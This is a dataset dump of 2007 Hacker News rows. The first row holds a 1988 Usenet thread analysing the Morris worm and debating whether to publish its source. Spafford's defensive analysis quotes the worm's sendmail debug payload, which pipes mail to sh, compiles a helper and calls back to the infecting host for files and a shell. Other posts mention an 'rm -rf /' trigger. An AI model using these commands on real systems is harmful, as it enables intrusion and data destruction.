machines.Non-internet sites do not need to worry about this virus (for now!),but be aware that mail and news may not be flowing everywhere for sometime -- many sites are disconnecting from the Internet completelyuntil the virus is contained.Gene Spaffordunread,Nov 3, 1988, 5:11:06 PM11/3/88to This is an updated description of how the worm works (note: it is technically a worm, not a virus, since it does not attach itselfto other code {that we know about}):All of our Vaxen and some of our Suns here were infected with theworm. The worm forks repeated copies of itself as it tries to spreaditself, and the load averages on the infected machines skyrocketed. Infact, it got to the point that some of the machines ran out of swapspace and kernel table entries, preventing login to even see what wasgoing on!The worm seems to consist of two parts. The way that it works is asfollows:1) Virus running on an infected machine opens a TCP connection to avictim machine's sendmail, invokes debug mode, and submits a versionof itself as a mail message.*OR* it uses rsh to create itself on the remote machine throughan account requiring no password (due to hosts.equiv or .rhostsentries).Using the sendmail route, it does something like:From: /dev/nullTo: "|sed -e 1,/^$/d | sh; exit 0"cd /usr/tmpcat > x14481910.c <<'EOF'<text of program deleted?EOFcc -o x14481910 x14481910.c;x14481910 128.10.2.215 32341 8712440;rm -f x14481910 x14481910.c2) This program is a simple "listener" or "helper" program of a fewdozen lines of fairly simple code. As you can see, the helper isinvoked with arguments pointing back at the infecting worm (givinghostid/socket/checksum(?) as arguments).3) The helper then connects to the "server" and copies a number offiles (presumably to /tmp). After the files are copied, it exec's ashell with standard input coming from the infecting worm program onthe other end of the socket.From here, I speculate on what happens since I can't find the source tothis part lying around on our machines:4) The newly exec'd shell attempts to compile itself from the filescopied over to the target machine. The command file it uses is asfollows:PATH=/bin:/usr/bin:/usr/ucbrm -f shif [ -f sh ]thenP=x%delseP=shcc -o $P %s/bin/echo %s./$P -p $$ 5) This creates and dispatches the new worm.. This worm opens all theworm source files, then unlinks the files so they can't be found (sinceit has them open, however, it can still access the contents). Next,the worm steps through the hosts file (on the Sun, it uses YP to stepthrough the distributed hosts file) trying to connect to othermachines' sendmail. If a connection succeeds, it forks a child processto infect it, while the parent continues to attempt infection of othermachines.7) The child requests and initializes a new socket, then buildsand invokes a listener with the new socket number and hostid asarguments (#1, above).Other notes:The worm runs in stages. It first collects info from the /etc/hostsfiles, the hosts.equiv file, and other files containing host names andhost IP addresses. It even runs netstat to find out what networks themachine is attached to! It uses this information to attempt topenetrate sendmail on those machines. It also knows how to penetrate"fingerd" on Vaxen (on Suns, the attempt results in a core dump). Iwill privately tell individuals how to fix the bug in fingerd, but fornow change it so it does not run as "root".After this first stage, it appears to sleep for a while. Then it startscollecting user names and it begins probing with "rsh". I believe italso permutes either an internal list of words, or it uses the namesfrom passwd, but it also tries to see if it can break any of thepasswords for local accounts; if so, if forks a child to use telnetto break into that account and copy itself.It tries to copy itself to other systems using rsh, fingerd, andpossibly also uucp and/or ftp.As I write this, no one seems to know what it is supposed to eventuallydo. Perhaps it just breaks in everywhere it can. I wonder ifit isn't just going to wait until some compiled-in time and thenrun an "rm -rf /" or something similar (and awful). Has anyone noticednew files in /usr/spool/at or included in /usr/lib/crontab?Other notes:The program corrupts its argument vector, so it appears in a "ps ax"as "(sh)" (a login shell). Don't trust any of these if you havethem running.The program doesn't copy around source files (except the helper) --it copies around pre-compiled binaries that are linked on the localmachine and then run. The worm appears to only be carrying binariesfor 68020-based Suns and Vax 7xx machines. Pyramids, Sun 2's andSequents are all definitely immune.The strings in the binaries are encrypted against a random "strings"invocation. If you have a binary, Keith Bostic informs me that Xor with 0x81 will reveal interesting things, although that is notthe only mask used.The first observation of the virus I have heard about was 6pmWednesday night in Pittsburgh. It didn't hit Purdue until about4 this morning.I will update you with any further information I may find.If you forward whatever information you find, I will try tocollate it.--spafAcknowledgements: Some of the above information was obtained fromBrian Kantor (UCSD), Keith Bostic (UCB), Thomas Narten (Purdue),Dan Trinkle (Purdue), and Miek Rowan (Purdue). Thanks, guys.-- Gene SpaffordNSF/Purdue/U of Florida Software Engineering Research Center,Dept. of Computer Sciences, Purdue University, W. Lafayette IN 47907-2004Internet: [email protected] uucp: ...!{decwrl,gatech,ucbvax}!purdue!spafMatt Landauunread,Nov 3, 1988, 5:18:03 PM11/3/88to The virus also appears to try to compile things in /tmp or /usr/tmp.One thing you can do is move /bin/cc to some other name, and install a shell script in /bin/cc that checks to see if it's being invoked from within one of your temp directories. This will help catch the virus as it tries to infect a new system.Ben Feenunread,Nov 4, 1988, 4:23:22 PM11/4/88to Help m! I assume from the language this is written in that the virusonly affects UNIX. Correct?-- _ /| I can read your mind and you should be ashamed.\'o.O' Remember- Stoplights timed for 35 MPH are also timed for 75 MPH.=(___)= This .sig file stolen by: U [email protected] for use with uunet/usenetunread,Nov 5, 1988, 8:19:41 AM11/5/88to In article <[email protected]>, [email protected] (Ben Feen) writes:> > Help m! I assume from the language this is written in that the virus> only affects UNIX. Correct?The header says it all.Jonathan BayerIntelligent Software Products, Inc.Phil R. Karnunread,Nov 6, 1988, 1:07:34 PM11/6/88to Now that we have a pretty good idea who wrote the virus and what hisintentions were, I would like to suggest something he might do that would goa long way toward mitigating the damage he has done.It sure would be nice if Morris (or someone at Cornell with access to hisfiles) were to release the complete, original source for the object portionof the virus. There are a *lot* of uneasy people out here who are notcompletely sure that it is now completely understood, and releasing thesource ASAP would go a long way toward quelling those fears.I'm probably not the only one who has been "invited" to an internal meetingin my organization to answer questions about the virus and the steps takento protect against it. The more we administrators know about the virus whenwe go into those meetings, the easier our lives will be over the next fewdays and weeks.Phil KarnGene Spaffordunread,Nov 6, 1988, 10:29:05 PM11/6/88to In article <[email protected]> [email protected] (Phil R. Karn) writes:>It sure would be nice if Morris (or someone at Cornell with access to his>files) were to release the complete, original source for the object portion>of the virus. Good heavens, no! At least, it shouldn't be widely published! Thevirus, as is, needs only a few small changes and it could be sent outagain to infect all those systems that don't have all the necessarypatches in place. Plus, there are other "backdoors" (known and not yetknown) into systems that could be added in. The result could be a realmess if someone else decides to try a "better" version of the worm.(Note -- it's a worm, not a virus, since it can replicate itself anddoes not hide itself inside other code.)What we really want is a list of all the things in the worm that takeadvantage of security holes, and advice on how to plug them. I'mworking on getting a disassembled version of the virus so I can doexactly that, and I will post the list here and in various other placeswhen I have it. If someone at Cornell wants to aid me in this, fine,but I really, really think we should not publish the code in anyway....providing it to trusted individuals with a promise not to spreadit is fine (I wouldn't mind Phil getting a copy, for instance, or RickAdams, etc., but I wouldn't want others to get it...and I won't namenames, although 3 or 4 spring instantly to mind). We want to knowwhat holes to plug, not provide a power drill to vandals.Obnoxious Math Grad Studentunread,Nov 7, 1988, 3:40:43 AM11/7/88to In article <[email protected]>, spaf@cs (Gene Spafford) writes:>In article <[email protected]> [email protected] (Phil R. Karn) writes:>>It sure would be nice if Morris (or someone at Cornell with access to his>>files) were to release the complete, original source for the object portion>>of the virus.>Good heavens, no! At least, it shouldn't be widely published! The>virus, as is, needs only a few small changes and it could be sent out>again to infect all those systems that don't have all the necessary>patches in place. Plus, there are other "backdoors" (known and not yet>known) into systems that could be added in. The result could be a real>mess if someone else decides to try a "better" version of the worm.The result could *also* be a real mess if you all think the bad guys aregoing to be slowed down very much by keeping the code a "secret". Good thing we don't have to worry about security down here at UC BUGSFORBRAINS, since Gene and company are going to keep the key critical stuff hush hush for us. --famous last words, the unknown sysadminWhat was it that H P Lovecraft said about "fear"?So regarding the release of the code: ___ All in favor of once-a-month INTERNET random fire drills say AYE. ___ All in favor of once-a-lifetime INTERNET catastrophic debacles say NO.ucbvax!garnet!weemba Matthew P Wiener/Brahms Gang/Berkeley CA 94720Phil Karnunread,Nov 7, 1988, 6:34:31 AM11/7/88to Gene, I respectfully disagree. After I posted my note, I discovered that thephage mailing list has had a raging debate about precisely this point. Eventhough I wrote my original note because *I* wanted a copy of the virus/wormsource so I could be well-informed for my management's sake, I have to sidewith those calling for complete disclosure. The only issue in my mind is theexact timing of the public release.I make the following arguments for my position.1. Making the source available would help enormously in assuaging managementfears about additional, presently undetected damage the worm might havecaused (it might really have been a virus, for example). They are likely tobe uncomfortable having to trust and rely on the expertise of a fairly smallgroup of people they don't know. By no means am I casting aspersions onthose who have been cracking the virus; only trying to calm what may well beunfounded fears. Complete disclosure is the best antidote to paranoia.2. The worm source just isn't that much more dangerous than knowledge of thesecurity holes it used. Frankly, I'm surprised that Morris used it to builda worm. Two things are paramount to a system cracker: undetectability,followed closely by untraceability in case of detection. If I were a spywith knowledge of the sendmail hole, I would have cracked systems one byone, perhaps through a series of "cheesebox" systems to avoid being traced.Until now I haven't really thought much about the design of worms, but evenwithout the benefit of hindsight it seems fairly obvious to me thatcontrolling the exact rate of their spread (to avoid detection) is verydifficult. Why should I risk the possibility of a worm getting out of handjust to save me the trouble of cracking systems semi-manually?3. It is just not that hard to turn the worm's binary into something reallydestructive. It certainly does not *require* the source code to do so. Infact, it doesn't even require patching the .o file. Just link it with amodule that replaces _exit (or another suitably chosen system call executednear the end) with a function that first executes "rm -rf /", then loops.4. The source will get out anyway, in one form or another; this isinevitable. Lots of people have been decompiling it, and not all feel thatit should be kept secret. Perhaps I only have to wait for it to appear inthe New York Times... :-)5. Making the source code generally available is perhaps *the* best way toprod the vendors into fixing *lots* of holes in their systems, not just theones exploited by the worm.Face it, we all know how vendors behave -- everyone does the least workpossible, subject to the vocalness of their customers' demands. Severalpeople have already stated that they knew of the hole in sendmail for manyyears and they just chalked it up to the net being composed of benignpeople. Since it wasn't generally known (I didn't know about it, forexample) there was no general cry to fix it, and it lay open long enough forMorris to come along and exploit it.6. I found it ironic to read that the elder Morris recently submitted apaper on UNIX security for publication, but his employer squelched it. Whoknows what was in that paper? Perhaps, just perhaps, maybe it contained adescription of the hole in sendmail, among other things. Perhaps, justperhaps, Robert Jr., learned of this hole from his dad. Perhaps if thatpaper had been published, people would have taken steps to protectthemselves before the younger Morris had unleashed his worm.In sum: SECURITY THROUGH OBSCURITY JUST DOESN'T WORK!PhilKarl Kleinpasteunread,Nov 7, 1988, 1:15:30 PM11/7/88to [email protected] (Phil R. Karn) writes: It sure would be nice if Morris (or someone at Cornell with access to his files) were to release the complete, original source for the object portion of the virus.That may well constitute an invasion of privacy, depending on the lawsof the state of NY, not to mention Cornell University privacypolicies. And considering that such files might soon become evidencein what could become a bona fide criminal proceeding, don't bet on it.Impartial juries can be tough to find.--KarlMark Lawrenceunread,Nov 8, 1988, 5:55:48 AM11/8/88to I'm just waiting for the logical next step after the most recent ruckus.I can imagine a conversation among mucky-mucks higher up in the DoD, NSAand NSC: "What the hell are we doing permitting access to Military Networks by hacker college geeks? What do you mean that anybody in the world with a PC and a modem can send traffic across our networks? What the hell is this mail and net news garbage anyway?..." ad nauseum.Gad, it sets me ill-at-ease to have our net techno-existance foisted upbefore national media for close scrutiny and examination. The potentialfor misinformation and misinterpretation of events due to lack ofunderstanding of the technicalities are great. There are generals,admirals, congress-critters and beaurocrats who are now (maybeneedlessly) worried about the how this worm (none of the media reportsthat I've seen have corrected the ubiquitous use of the 'virus' term) or the next occurance might affect SAC, NORAD, the security system at Fort Knox or some other crucial computerized facility. Whether the danger to such such systems is real or not is immaterial to the policy-setters and the decision-makers. They will (do?) percieve vulnerability and (knee-jerk reaction) steps will be taken. I think that the probability is great that such (not well thought out or informed) actions could radically change the Net as we know it. Markpeter honeymanunread,Nov 8, 1988, 9:12:40 PM11/8/88to Mark Lawrence imagines a bunch of generals saying> "What the hell are we doing permitting access to Military Networks> by hacker college geeks? What do you mean that anybody in the world> with a PC and a modem can send traffic across our networks? What> the hell is this mail and net news garbage anyway?..." ad nauseum.ironically, internet access to milnet is already prevented, with theexcept of one application: mail.boom. peterRoy Smithunread,Nov 9, 1988, 8:25:41 AM11/9/88to [email protected] (Gene Spafford) writes:> (Note -- it's a worm, not a virus, since it can replicate itself and> does not hide itself inside other code.) Several people have mentioned that it's a worm and not a virus. Itried to explain this to my wife (who is a molecular biologist who workswith biolgical viruses) and she didn't like the term worm. She says thatthe distinction of not hiding inside other code is better described bycalling them lytic viruses and lysogenic viruses instead of worms andviruses. Anybody for electronic transposons?-- Roy Smith, System AdministratorPublic Health Research Institute{allegra,philabs,cmcl2,rutgers}!phri!roy -or- [email protected]"The connector is the network"Ken Olumunread,Nov 10, 1988, 9:44:45 AM11/10/88to In article <[email protected]> [email protected] (Roy Smith) writes:>[email protected] (Gene Spafford) writes:>> (Note -- it's a worm, not a virus, since it can replicate itself and>> does not hide itself inside other code.)>> Several people have mentioned that it's a worm and not a virus. I>tried to explain this to my wife (who is a molecular biologist who works>with biolgical viruses) and she didn't like the term worm. She says that>the distinction of not hiding inside other code is better described by>calling them lytic viruses and lysogenic viruses instead of worms and>viruses. Anybody for electronic transposons?The terminology depends on the exact analogy that you make betweencomputers and living things. If you say that a machine is like acell, then this recent problem is indeed a virus, because it getsinside your host and uses the machinery of the host to reproduceitself and spread to other machines. If you say that a program islike a cell, and a machine is like a multicellular organism, then it'sa parasite instead. If you say a machine is just a fertile placewhere programs live, then the "virus' is just a random organism. Ifavor the first analogy, and I think the lytic/lysogenic terms aregood ones, but somehow I can't see them getting used much by the newsmedia. Ken OlumHans Buurmanunread,Nov 11, 1988, 10:50:07 AM11/11/88to In article <1617@edsel> [email protected] writes:>In article <[email protected]> [email protected] (Roy Smith) writes:>>[email protected] (Gene Spafford) writes:>>> (Note -- it's a worm, not a virus, since it can replicate itself and>>> does not hide itself inside other code.)>>(...) She says that>>the distinction of not hiding inside other code is better described by>>calling them lytic viruses and lysogenic viruses instead of worms and>>viruses. Anybody for electronic transposons?>(...) I>favor the first analogy, and I think the lytic/lysogenic terms are>good ones, but somehow I can't see them getting used much by the news>media.If you look at the reproduction rate, shouldn't this program be calleda rabbit ?:-) Hans-----------------------------------------------------------------------------Hans Buurman | [email protected] Recognition Group | mcvax!dutrun!duttnph!hansFaculty of Applied Physics | tel. 31 - (0) 15 - 78 46 94Delft University of Technology |the Netherlands |-----------------------------------------------------------------------------Disclaimer: any opinions expressed above are my own....Joseunread,Nov 11, 1988, 11:50:07 AM11/11/88to In article <[email protected]> [email protected] (Roy Smith) writes:>[email protected] (Gene Spafford) writes:>> (Note -- it's a worm, not a virus, since it can replicate itself and>> does not hide itself inside other code.)> Several people have mentioned that it's a worm and not a virus. I>tried to explain this to my wife (who is a molecular biologist who works>with biolgical viruses) and she didn't like the term worm. She says that ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Actually, IT IS very much like a parastic worm, which invadesa biological system, and uses the host as a domain for its own reproductionand activity. It can then travel from system to system (ie. person to personthrough certain types of contact). It doesn't actually change the geneticsof a person (ie. does not attatch itself to the code), but can harm the system by interupting normal processes.-----------------------------------------------------------------------------"Fighting for Truth, Kenneth C. Moyle Justice, and Department of Biochemistry anything else that McMaster University - Hamilton, Ontario seems fun at the time" kenm@maccs-----------------------------------------------------------------------------Brandon S. Allberyunread,Nov 14, 1988, 3:17:56 PM11/14/88to As quoted from <[email protected]> by [email protected] (Gene Spafford):+---------------| In article <[email protected]> [email protected] (Phil R. Karn) writes:| >It sure would be nice if Morris (or someone at Cornell with access to his| >files) were to release the complete, original source for the object portion| >of the virus. | | Good heavens, no! At least, it shouldn't be widely published! The| virus, as is, needs only a few small changes and it could be sent out| again to infect all those systems that don't have all the necessary| patches in place. Plus, there are other "backdoors" (known and not yet| known) into systems that could be added in. The result could be a real| mess if someone else decides to try a "better" version of the worm.+---------------G*d, yes! Anyone who disbelieves this should look up the history of the"nVIR" virus family on the Macintosh. And *that* started out as a PUBLISHEDEXAMPLE of a POTENTIAL security hole!!!++Brandon-- Brandon S. Allbery, comp.sources.misc moderator and one admin of ncoast PA UN*Xuunet!hal.cwru.edu!ncoast!allbery <PREFERRED!> [email protected][email protected] <ALSO> [email protected] is moving off ncoast -- please do NOT send submissions direct Send comp.sources.misc submissions to comp-sources-misc@<backbone>.Mike Klausunread,Nov 21, 1988, 5:21:58 PM11/21/88to In article <[email protected]>, [email protected] (Gene Spafford) writes:> (Note -- it's a worm, not a virus, since it can replicate itself and> does not hide itself inside other code.) OK, it's been established that it's a worm... ^^^^> > I'm working on getting a disassembled version of the virus so I can do... ^^^^^ Is this a freudian slip? Is there something else running around in the net(s)? Did someone say grafitti? mak Story: Once upon a time, there was a computer tournament between CIT and MIT involving a chess game. This was extremely tedious and boring until a couple of nerds started a new game with initial setup consisting exclusively of forks..... | 2024-11-08T01:38:36 | null | train |
18,603 | ereldon | 2007-05-02T04:56:51 | Does anyone use SUN's Startup Essentials? Just wondering. | null | http://www.sun.com/emrkt/startupessentials/ | 1 | 0 | null | null | null | null | null | null | null | null | null | null | train |
18,608 | startupprincess | 2007-05-02T05:32:43 | Getting Busy? Consider a Virtual Assistant | null | http://startupprincess.com/wordpress/getting-busy-consider-a-virtual-assistant/ | 2 | 0 | null | null | null | null | null | null | null | null | null | null | train |
18,611 | rms | 2007-05-02T05:44:29 | back up, delete me | null | http://www.digg.com | 1 | 0 | [
18614
] | null | true | null | null | null | null | null | null | null | train |
18,612 | mhidalgo | 2007-05-02T05:44:31 | Apparently Digg isn't the only one doing shady stuff...google is as well | null | http://taoetc.org/69 | 6 | 2 | [
18622,
19350
] | null | null | null | null | null | null | null | null | null | train |
18,618 | nreme | 2007-05-02T05:49:48 | A Teen social network that has been growing organically released by Myspace | null | http://www.alexa.com/data/details/traffic_details?site0=www.teenwag.com&site1=&site2=&site3=&site4=&y=t&z=1&h=400&w=700&range=6m&size=Large&url=www.teenwag.com | 1 | -1 | null | null | true | null | null | null | null | null | null | null | train |
18,624 | staunch | 2007-05-02T06:21:27 | SysAdmins of Well Known Web Sites Discuss Disk Monitoring For MogileFS | null | http://lists.danga.com/pipermail/mogilefs/2007-May/000899.html | 1 | 0 | null | null | null | null | null | null | null | null | null | null | train |
18,631 | rms | 2007-05-02T06:43:46 | Kevin Rose's response | null | http://blog.digg.com/?p=74? | 8 | 0 | null | null | null | null | null | null | null | null | null | null | train |
18,638 | purblind | 2007-05-02T07:19:43 | Sphere Redesigned to Focus on Connections Between News Stories | null | http://www.techcrunch.com/2007/05/01/new-sphere-focuses-on-connections-between-news-stories/ | 1 | 0 | null | null | null | no_error | New Sphere Focuses On Connections Between News Stories | TechCrunch | 2007-05-02T04:21:23+00:00 | Michael Arrington |
When blog search engine Sphere launched in May 2006, it included a unique feature that discovered, on the fly, stories related to what you were reading regardless of whether or not the two stories were hyperlinked.
The feature, called “Sphere It,” has grown in popularity and has helped Sphere get itself embedded in top blogs and news sites. We include a Sphere It link at the bottom of each post, which pulls up a window where other blog stories that talk about related issues are shown. Time.com and other major news sites have done the same. Today, a substantial portion of Sphere’s total traffic comes from these partner sites using the feature to generate more content (and page views) for readers.
Tonight Sphere relaunched their home page to reflect the usefulness of this feature. The main area of the site is broken down into four columns. On the left are major topics, like Top News, U.S. News, Entertainment, Sports, Technology, etc. Click on any topic and the second column populates with recent news items from Sphere partners (sites like ours, Time.com and others that include the Sphere It functionality) that has generated a lot of buzz, which is calculated based on page views for the item (against an average for the site) and other factors the company isn’t disclosing (but which probably include an anlysis of the extent to which other sites are writing about similar things).
Click on any news item and it is pulled up in column three. In column four, related news items are shown.
You can keep clicking on a topic infinitely. Click on a column four story – it moves left, and column four shows news items related to that story.
Like TechMeme, the new Sphere site can become a place that people check frequently to see what news is breaking in the blogosphere and mainstream media, and see other content about that topic. It’s different than TechMeme in that Sphere doesn’t require links between articles.
News sites that want to be included in Sphere It must add the feature to their sites. The Sphere home page has a link to do that.
Sphere has raised just $4 million to date from True Ventures, Trident Capital and a number of angel investors. The company has eight employees.
Most Popular
Michael Arrington most recently Co-Founded CrunchFund after leading TechCrunch to a successful exit with AOL. His venture investments include Uber, Airbnb and Pinterest. Michael was the Editor of TechCrunch, which he founded in 2005. In 2008 Time Magazine named Michael “One of the World’s 100 most influential people”. Michael also practiced securities law at O’Melveny & Myers and Wilson Sonsini Goodrich & Rosati.Michael graduated from Stanford Law School and
Claremont McKenna College.
View Bio
Newsletters
Subscribe for the industry’s biggest tech news
Related
Latest in TC
| 2024-11-07T08:30:34 | en | train |
18,641 | farmer | 2007-05-02T07:30:22 | Unanimous Supreme Court decision against trivial patents | null | http://unenumerated.blogspot.com/2007/04/patent-double-whammy-supreme-court.html | 2 | 0 | null | null | null | null | null | null | null | null | null | null | train |
18,653 | mattjaynes | 2007-05-02T08:45:24 | 'Cool kids' of the tech world | null | http://www.crazyontap.com/topic.php?TopicId=18024&Posts=1 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | train |
18,654 | mattjaynes | 2007-05-02T08:47:40 | Great hand-drawn map of social network world | null | http://xkcd.com/c256.html | 14 | 4 | [
18704,
18833
] | null | null | null | null | null | null | null | null | null | train |
18,656 | macsucks | 2007-05-02T09:28:54 | Why do hackers buy Macbooks even though they really suck? So are they really hackers,even Sergey Brin uses a Windows XP pc...! | null | http://mac.teenwag.com/poll?n=1736 | 1 | -1 | null | null | true | null | null | null | null | null | null | null | train |
18,657 | macsucks | 2007-05-02T09:29:54 | Do you use Google or Live or Yahoo! What does it tell about your personality | null | http://mac.teenwag.com/poll?n=1742 | 1 | -1 | null | null | true | null | null | null | null | null | null | null | train |
18,665 | danielha | 2007-05-02T10:52:00 | HeardOnTV.com - Music from your favorite TV shows | null | http://www.profy.com/2007/05/02/heardontvcom-music-from-your-favorite-tv-shows/ | 1 | 0 | null | null | null | http_404 | 404 Not Found | null | null |
Server Error
404
Page Not Found
This page either doesn't exist, or it moved somewhere else.
That's what you can do
Reload Page
Back to Previous Page
Home Page
| 2024-11-07T23:05:36 | null | train |
18,668 | bootload | 2007-05-02T11:36:13 | Fallacies of Distributed Computing | null | http://en.wikipedia.org/wiki/Fallacies_of_Distributed_Computing | 1 | 0 | null | null | null | missing_parsing | Fallacies of distributed computing | 2005-12-03T09:43:53Z | Contributors to Wikimedia projects |
From Wikipedia, the free encyclopedia
The fallacies of distributed computing are a set of assertions made by L Peter Deutsch and others at Sun Microsystems describing false assumptions that programmers new to distributed applications invariably make.
The originally listed fallacies are[1]
The network is reliable;
Latency is zero;
Bandwidth is infinite;
The network is secure;
Topology doesn't change;
There is one administrator;
Transport cost is zero;
The network is homogeneous;
The effects of the fallacies[edit]
Software applications are written with little error-handling on networking errors. During a network outage, such applications may stall or infinitely wait for an answer packet, permanently consuming memory or other resources. When the failed network becomes available, those applications may also fail to retry any stalled operations or require a (manual) restart.
Ignorance of network latency, and of the packet loss it can cause, induces application- and transport-layer developers to allow unbounded traffic, greatly increasing dropped packets and wasting bandwidth.
Ignorance of bandwidth limits on the part of traffic senders can result in bottlenecks.
Complacency regarding network security results in being blindsided by malicious users and programs that continually adapt to security measures.
Changes in network topology can have effects on both bandwidth and latency issues, and therefore can have similar problems.
Multiple administrators, as with subnets for rival companies, may institute conflicting policies of which senders of network traffic must be aware in order to complete their desired paths.
The "hidden" costs of building and maintaining a network or subnet are non-negligible and must consequently be noted in budgets to avoid vast shortfalls.
If a system assumes a homogeneous network, then it can lead to the same problems that result from the first three fallacies.
The list of fallacies originated at Sun Microsystems. L. Peter Deutsch, one of the original Sun "Fellows", first created a list of seven fallacies in 1994; incorporating four fallacies Bill Joy and Dave Lyon had already identified in "The Fallacies of Networked Computing".[2] Around 1997, James Gosling, another Sun Fellow and the inventor of Java, added the eighth fallacy.[2]
In an episode of "Software Engineering Radio" [3] Peter Deutsch added a ninth fallacy: "It's really an expansion of number 4. It extends beyond the boundaries of the physical network. ... The party you are communicating with is trustworthy."
Later in 2020, Mark Richards and Neal Ford expanded upon the original "Fallacies of Distributed Computing" by introducing three additional fallacies to address contemporary challenges in distributed systems: [4]
Versioning is simple
Compensating updates always work
Observability is optional
CAP theorem
PACELC theorem
Distributed computing
Fine vs coarse grained SOA
^ Wilson, Gareth (2015-02-06). "The Eight Fallacies of Distributed Computing - Tech Talk". Archived from the original on 2017-11-07. Retrieved 2017-06-18. The Eight Fallacies are something that I heard about at a Java One conference a long time ago by a guy named James Gosling. He attributed them to someone named Peter Deutsch and basically a bunch of guys at Sun had come up with a list of these fallacies.
^ a b Van Den Hoogen, Ingrid (2004-01-08). "Deutsch's Fallacies, 10 Years After". Archived from the original on 2007-08-11. Retrieved 2005-12-03.
^ L. Peter Deutsch on the Fallacies of Distributed Computing. 2021-07-27. Event occurs at 57:10.
^ Richards, Mark. Fundamentals of Software Architecture: An Engineering Approach. O'Reilly Media. ISBN 978-1492043454.
Deutsch, Peter. "The Eight Fallacies of Distributed Computing". nighthacks.com. Retrieved 2024-07-24.
Rotem-Gal-Oz, Arnon (January 2008). "Fallacies of Distributed Computing Explained". Retrieved 2024-07-24 – via ResearchGate.
| 2024-11-08T21:04:25 | null | train |
18,669 | dpapathanasiou | 2007-05-02T11:49:45 | Invite to "Launch: Silicon Valley 2007" | null | 2 | 6 | [
18670,
18814,
18693
] | null | null | invalid_url | null | null | null | null | 2024-11-08T16:37:59 | null | train |
|
18,674 | sajid | 2007-05-02T12:51:11 | Why Did Friendster Fail? | null | http://www.nytimes.com/2006/10/15/business/yourmoney/15friend.html?ex=1318564800&en=3e9438ed349f7ce7&ei=5090&partner=rssuserland&emc=rss | 7 | 9 | [
18699,
18696,
18676,
18812,
18890
] | null | null | bot_blocked | nytimes.com | null | null | Please enable JS and disable any ad blocker | 2024-11-08T07:50:05 | null | train |
18,679 | gibsonf1 | 2007-05-02T13:12:59 | YouTube Shocker: Chase Bank Records Found In Trash | null | http://wcbstv.com/topstories/local_story_121055435.html | 3 | 1 | [
18695
] | null | null | null | null | null | null | null | null | null | train |
18,680 | gibsonf1 | 2007-05-02T13:16:46 | How the Internet took over | null | http://www.usatoday.com/tech/top25-internet.htm | 1 | 0 | null | null | null | null | null | null | null | null | null | null | train |
18,681 | gibsonf1 | 2007-05-02T13:21:15 | Vista-Based PC Games Could Blow Consoles Out of Water | null | http://www.foxnews.com/story/0,2933,269017,00.html | 1 | 0 | null | null | null | null | null | null | null | null | null | null | train |
18,682 | gibsonf1 | 2007-05-02T13:23:36 | Defense Department Working on High-Tech Lie Detectors | null | http://www.foxnews.com/story/0,2933,269076,00.html | 1 | 0 | null | null | null | null | null | null | null | null | null | null | train |
18,683 | gibsonf1 | 2007-05-02T13:25:49 | MySpace Launches Beta Version of Chinese Edition | null | http://www.foxnews.com/story/0,2933,268982,00.html | 1 | 0 | null | null | null | null | null | null | null | null | null | null | train |
18,684 | jslogan | 2007-05-02T13:29:31 | Here's why the business relationship with consultants is upside down | null | http://www.jslogan.com/content/view/166/ | 2 | 0 | null | null | null | null | null | null | null | null | null | null | train |
18,686 | gibsonf1 | 2007-05-02T13:30:00 | YouTube adds Active Sharing feature to videos | null | http://www.webware.com/8301-1_109-9714008-2.html?tag=blog | 1 | 0 | null | null | null | null | null | null | null | null | null | null | train |
18,689 | gibsonf1 | 2007-05-02T13:31:34 | Google re-branding personal home page, adding widget maker | null | http://www.webware.com/8301-1_109-9714279-2.html?tag=blog | 2 | 0 | null | null | null | fetch failed | null | null | null | null | 2024-11-08T12:47:50 | null | train |
18,691 | gibsonf1 | 2007-05-02T13:34:04 | HP touts new mold for the chip industry | null | http://news.com.com/HP+touts+new+mold+for+the+chip+industry/2100-1008_3-6180595.html?tag=nefd.lede | 1 | 0 | null | null | null | null | null | null | null | null | null | null | train |
18,706 | immad | 2007-05-02T14:19:54 | Whats the best option for customised Web analytics? (Ruby on Rails or otherwise) | null | 1 | 1 | [
18707
] | null | null | invalid_url | null | null | null | null | 2024-11-08T16:37:59 | null | train |
|
18,708 | usablecontent | 2007-05-02T14:25:11 | FeedLounge Says Goodbye | null | http://startupmeme.com/2007/05/02/feedlounge-says-goodbye/ | 1 | 0 | null | null | null | null | null | null | null | null | null | null | train |
18,714 | gibsonf1 | 2007-05-02T14:40:24 | More than an open-source curiosity (Mono - .net on Linux?) | null | http://news.com.com/More+than+an+open-source+curiosity/2008-7344_3-5271084.html | 1 | 0 | null | null | null | null | null | null | null | null | null | null | train |
18,730 | usablecontent | 2007-05-02T15:52:51 | Anatomy of the Digg Crisis | null | http://startupmeme.com/2007/05/02/anatomy-of-the-digg-crisis/ | 3 | 4 | [
18736,
18733
] | null | null | null | null | null | null | null | null | null | train |
18,731 | source | 2007-05-02T15:55:14 | FeedLounge shuts down | null | http://feedlounge.com/blog/2007/04/30/time-to-say-goodbye/ | 2 | 0 | null | null | null | null | null | null | null | null | null | null | train |
18,735 | mattjaynes | 2007-05-02T16:03:43 | Employees: A Threat to Your Business? | null | http://www.michaeleagar.com/2007/05/02/employees-a-threat-to-your-business/ | 1 | 0 | null | null | null | http_404 | Page Not Found | Successful Courses & Student Success | null | null |
No Results Found
The page you requested could not be found. Try refining your search, or use the navigation above to locate the post.
| 2024-11-08T04:14:45 | null | train |
18,737 | mattjaynes | 2007-05-02T16:12:21 | The Mid Life Entrepreneur Crisis | null | http://avc.blogs.com/a_vc/2007/05/the_mid_life_en.html | 11 | 5 | [
18935,
18923,
19120,
18821,
19323
] | null | null | null | null | null | null | null | null | null | train |
18,738 | fruscica | 2007-05-02T16:14:24 | Startup Comedy 101 (1m18s video, via Veoh.com) | null | http://www.veoh.com/videos/v446231eTRDQWZM | 1 | 0 | null | null | null | null | null | null | null | null | null | null | train |
18,740 | mattjaynes | 2007-05-02T16:15:40 | 5 Ways to Avoid "Founderitis" | null | http://startupspark.com/5-ways-to-avoid-founderitis/ | 4 | 1 | [
18772
] | null | null | null | null | null | null | null | null | null | train |
18,742 | dawie | 2007-05-02T16:19:36 | Joost Launching Today | null | http://startupmeme.com/2007/05/01/joost-launching-today/ | 2 | 2 | [
18804,
18799
] | null | null | null | null | null | null | null | null | null | train |
18,744 | champion | 2007-05-02T16:22:57 | Burning Bridges: East Coast vs. West Coast | null | http://graysky.org/2007/05/burning-bridges/ | 1 | 0 | null | null | null | null | null | null | null | null | null | null | train |
